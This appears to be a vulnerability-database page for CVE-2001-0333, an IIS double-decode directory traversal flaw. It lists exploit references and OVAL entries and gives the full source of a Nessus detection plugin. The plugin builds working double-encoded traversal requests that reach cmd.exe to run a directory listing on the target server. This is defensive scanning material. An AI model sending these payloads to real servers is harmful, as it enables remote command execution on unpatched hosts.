Vulnerabilities > CVE-2001-0333 - Unspecified vulnerability in Microsoft Internet Information Server

047910
CVSS 7.5 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
low complexity
microsoft
nessus
exploit available
metasploit

Summary

Directory traversal vulnerability in IIS 5.0 and earlier allows remote attackers to execute arbitrary commands by encoding .. (dot dot) and "\" characters twice.

Exploit-Db

  • descriptionMicrosoft IIS/PWS CGI Filename Double Decode Command Execution. CVE-2001-0333. Remote exploit for windows platform
    idEDB-ID:16467
    last seen2016-02-01
    modified2011-01-08
    published2011-01-08
    reportermetasploit
    sourcehttps://www.exploit-db.com/download/16467/
    titleMicrosoft IIS/PWS CGI Filename Double Decode Command Execution
  • descriptionMS IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (6). CVE-2001-0333 . Remote exploit for windows platform
    idEDB-ID:20840
    last seen2016-02-02
    modified2001-05-15
    published2001-05-15
    reporterA.Ramos
    sourcehttps://www.exploit-db.com/download/20840/
    titleMicrosoft IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution 6
  • descriptionMS IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (7). CVE-2001-0333 . Remote exploit for windows platform
    idEDB-ID:20841
    last seen2016-02-02
    modified2001-05-15
    published2001-05-15
    reporterGary O'Leary-Steele
    sourcehttps://www.exploit-db.com/download/20841/
    titleMicrosoft IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution 7
  • descriptionMS IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (8). CVE-2001-0333 . Remote exploit for windows platform
    idEDB-ID:20842
    last seen2016-02-02
    modified2001-05-15
    published2001-05-15
    reporterRoelof
    sourcehttps://www.exploit-db.com/download/20842/
    titleMicrosoft IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution 8
  • descriptionMS IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (3). CVE-2001-0333 . Remote exploit for windows platform
    idEDB-ID:20837
    last seen2016-02-02
    modified2001-05-15
    published2001-05-15
    reporterCyrus The Gerat
    sourcehttps://www.exploit-db.com/download/20837/
    titleMicrosoft IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution 3
  • descriptionMS IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (4). CVE-2001-0333 . Remote exploit for windows platform
    idEDB-ID:20838
    last seen2016-02-02
    modified2001-05-15
    published2001-05-15
    reporterMovAX
    sourcehttps://www.exploit-db.com/download/20838/
    titleMicrosoft IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution 4
  • descriptionMS IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (1). CVE-2001-0333 . Remote exploit for windows platform
    idEDB-ID:20835
    last seen2016-02-02
    modified2001-05-15
    published2001-05-15
    reporterFilip Maertens
    sourcehttps://www.exploit-db.com/download/20835/
    titleMicrosoft IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution 1
  • descriptionMS IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (2). CVE-2001-0333 . Remote exploit for windows platform
    idEDB-ID:20836
    last seen2016-02-02
    modified2001-05-16
    published2001-05-16
    reporterHuXfLuX
    sourcehttps://www.exploit-db.com/download/20836/
    titleMicrosoft IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution 2
  • descriptionMS IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (5). CVE-2001-0333 . Remote exploit for windows platform
    idEDB-ID:20839
    last seen2016-02-02
    modified2001-05-15
    published2001-05-15
    reporterLeif Jakob
    sourcehttps://www.exploit-db.com/download/20839/
    titleMicrosoft IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution 5

Metasploit

descriptionThis module will execute an arbitrary payload on a Microsoft IIS installation that is vulnerable to the CGI double-decode vulnerability of 2001. NOTE: This module will leave a metasploit payload in the IIS scripts directory.
idMSF:EXPLOIT/WINDOWS/IIS/MS01_026_DBLDECODE
last seen2020-06-01
modified2020-05-19
published2010-07-12
references
reporterRapid7
sourcehttps://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/iis/ms01_026_dbldecode.rb
titleMS01-026 Microsoft IIS/PWS CGI Filename Double Decode Command Execution

Nessus

NASL familyWeb Servers
NASL idIIS_DECODE_BUG.NASL
descriptionWhen IIS receives a user request to run a script, it renders the request in a decoded canonical form, and then performs security checks on the decoded request. A vulnerability results because a second, superfluous decoding pass is performed after the initial security checks are completed. Thus, a specially crafted request could allow an attacker to execute arbitrary commands on the IIS Server.
last seen2020-06-01
modified2020-06-02
plugin id10671
published2001-05-15
reporterThis script is Copyright (C) 2001-2018 Matt Moore / H D Moore
sourcehttps://www.tenable.com/plugins/nessus/10671
titleMS01-026 / MS01-044: Microsoft IIS Remote Command Execution (uncredentialed check)
code
#
# This script was modified Matt Moore ([email protected])
# from the NASL script to test for the UNICODE directory traversal
# vulnerability, originally written by Renaud Deraison.
#
# Then Renaud took Matt's script and used H D Moore modifications
# to iis_dir_traversal.nasl ;)
#

# Changes by Tenable:
# - Touched up description (11/04/10)
# - Add MSKB script_xref (8/29/17)

include("compat.inc");

if (description)
{
 script_id(10671);
 script_version("1.62");
 script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/12");

 script_cve_id("CVE-2001-0333", "CVE-2001-0507");
 script_bugtraq_id(2708, 3193);
 script_xref(name:"MSFT", value:"MS01-026");
 script_xref(name:"MSFT", value:"MS01-044");
 script_xref(name:"MSKB", value:"288855");
 script_xref(name:"MSKB", value:"293826");
 script_xref(name:"MSKB", value:"294370");
 script_xref(name:"MSKB", value:"294774");
 script_xref(name:"MSKB", value:"295534");
 script_xref(name:"MSKB", value:"297860");
 script_xref(name:"MSKB", value:"298340");
 script_xref(name:"MSKB", value:"301625");
 script_xref(name:"MSKB", value:"304867");
 script_xref(name:"MSKB", value:"305359");

 script_name(english:"MS01-026 / MS01-044: Microsoft IIS Remote Command Execution (uncredentialed check)");
 script_summary(english:"Determines if arbitrary commands can be executed");

 script_set_attribute(attribute:"synopsis", value:"Arbitrary commands can be executed on the remote web server.");
 script_set_attribute(attribute:"description", value:
"When IIS receives a user request to run a script, it renders the
request in a decoded canonical form, and then performs security checks
on the decoded request.  A vulnerability results because a second,
superfluous decoding pass is performed after the initial security checks
are completed.  Thus, a specially crafted request could allow an
attacker to execute arbitrary commands on the IIS Server.");
 script_set_attribute(attribute:"see_also", value:"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2001/ms01-026");
 script_set_attribute(attribute:"see_also", value:"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2001/ms01-044");
 script_set_attribute(attribute:"solution", value:"Microsoft has released a set of patches for IIS 4.0 and 5.0.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'MS01-026 Microsoft IIS/PWS CGI Filename Double Decode Command Execution');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
 script_set_attribute(attribute:"canvas_package", value:'CANVAS');

 script_set_attribute(attribute:"vuln_publication_date", value:"2001/05/15");
 script_set_attribute(attribute:"patch_publication_date", value:"2001/05/15");
 script_set_attribute(attribute:"plugin_publication_date", value:"2001/05/15");

 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_set_attribute(attribute:"cpe", value:"cpe:/a:microsoft:iis");
 script_end_attributes();


 script_category(ACT_GATHER_INFO);
 script_copyright(english:"This script is Copyright (C) 2001-2020 Matt Moore / H D Moore");
 script_family(english:"Web Servers");
 script_dependencie("find_service1.nasl", "http_version.nasl", "www_fingerprinting_hmap.nasl");
 script_require_ports("Services/www", 80);
 exit(0);
}

include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");


port = get_http_port(default:80, embedded:TRUE);

banner = get_http_banner(port:port);
if ( "IIS" >!< banner ) exit(0);

if ( banner =~ "Microsoft-IIS/[6-9]" ) exit(0);

if(!get_port_state(port))exit(0);


dir[0] = "/scripts/";
dir[1] = "/msadc/";
dir[2] = "/iisadmpwd/";
dir[3] = "/_vti_bin/";		# FP
dir[4] = "/_mem_bin/";		# FP
dir[5] = "/exchange/";		# OWA
dir[6] = "/pbserver/";		# Win2K
dir[7] = "/rpc/";		# Win2K
dir[8] = "/cgi-bin/";
dir[9] = "/";

uni[0] = "%255c";  	dots[0] = "..";
uni[1] = "%%35c";	dots[1] = "..";
uni[2] = "%%35%63";	dots[2] = "..";
uni[3] = "%25%35%63";   dots[3] = "..";
uni[4] = "%252e";	dots[4] = "/.";




function check(req)
{
 local_var	r, pat, pat2;
 r = http_keepalive_send_recv(port:port, data:http_get(item:req, port:port));
 if(r == NULL)
 {
  exit(0);
 }

 pat = "<DIR>";
 pat2 = "Directory of C";

 if((pat >< r) || (pat2 >< r)){
   	security_hole(port:port, extra:
strcat('\n Requesting\n ', build_url(port: port, qs: req), '\n produces :\n\n', r));
	return(1);
 	}
 return(0);
}


cmd = "/winnt/system32/cmd.exe?/c+dir+c:\\+/OG";
for(d=0;dir[d];d=d+1)
{
	for(i=0;uni[i];i=i+1)
	{
		url = string(dir[d], dots[i], uni[i], dots[i], uni[i], dots[i], uni[i], dots[i], uni[i], dots[i], uni[i], dots[i], cmd);
		if(check(req:url))exit(0);
	}
}


# Slight variation- do the same, but don't put dots[i] in front
# of cmd (reported on vuln-dev)

for(d=0;dir[d];d=d+1)
{
	for(i=0;uni[i];i=i+1)
	{
		url = string(dir[d], dots[i], uni[i], dots[i], uni[i], dots[i], uni[i], dots[i], uni[i], dots[i], uni[i], cmd);
		if(check(req:url))exit(0);
	}
}


Oval

  • accepted2007-08-02T14:47:14.863-04:00
    classvulnerability
    contributors
    • nameChristine Walzer
      organizationThe MITRE Corporation
    • nameRobert L. Hollis
      organizationThreatGuard, Inc.
    descriptionDirectory traversal vulnerability in IIS 5.0 and earlier allows remote attackers to execute arbitrary commands by encoding .. (dot dot) and "\" characters twice.
    familywindows
    idoval:org.mitre.oval:def:1018
    statusaccepted
    submitted2004-05-12T12:00:00.000-04:00
    titleWindows NT IIS Directory Traversal Command Execution (Test 2)
    version28
  • accepted2004-06-30T12:00:00.000-04:00
    classvulnerability
    contributors
    nameChristine Walzer
    organizationThe MITRE Corporation
    descriptionDirectory traversal vulnerability in IIS 5.0 and earlier allows remote attackers to execute arbitrary commands by encoding .. (dot dot) and "\" characters twice.
    familywindows
    idoval:org.mitre.oval:def:1051
    statusaccepted
    submitted2004-05-12T12:00:00.000-04:00
    titleWindows 2000 IIS Directory Traversal Command Execution (Test 2)
    version64
  • accepted2016-02-08T10:00:00.000-05:00
    classvulnerability
    contributors
    nameTiffany Bergeron
    organizationThe MITRE Corporation
    descriptionDirectory traversal vulnerability in IIS 5.0 and earlier allows remote attackers to execute arbitrary commands by encoding .. (dot dot) and "\" characters twice.
    familywindows
    idoval:org.mitre.oval:def:37
    statusaccepted
    submitted2003-10-10T12:00:00.000-04:00
    titleWindows NT IIS Directory Traversal Command Execution (Test 1)
    version27
  • accepted2011-05-16T04:03:27.809-04:00
    classvulnerability
    contributors
    • nameTiffany Bergeron
      organizationThe MITRE Corporation
    • nameTiffany Bergeron
      organizationThe MITRE Corporation
    • nameShane Shaffer
      organizationG2, Inc.
    • nameSudhir Gandhe
      organizationTelos
    • nameShane Shaffer
      organizationG2, Inc.
    descriptionDirectory traversal vulnerability in IIS 5.0 and earlier allows remote attackers to execute arbitrary commands by encoding .. (dot dot) and "\" characters twice.
    familywindows
    idoval:org.mitre.oval:def:78
    statusaccepted
    submitted2003-10-10T12:00:00.000-04:00
    titleWindows 2000 IIS Directory Traversal Command Execution (Test 1)
    version33

Packetstorm

Saint

bid2708
descriptionIIS Double Decoding Directory Traversal
idweb_server_iis_double
osvdb556
titleiis_double_decode
typeremote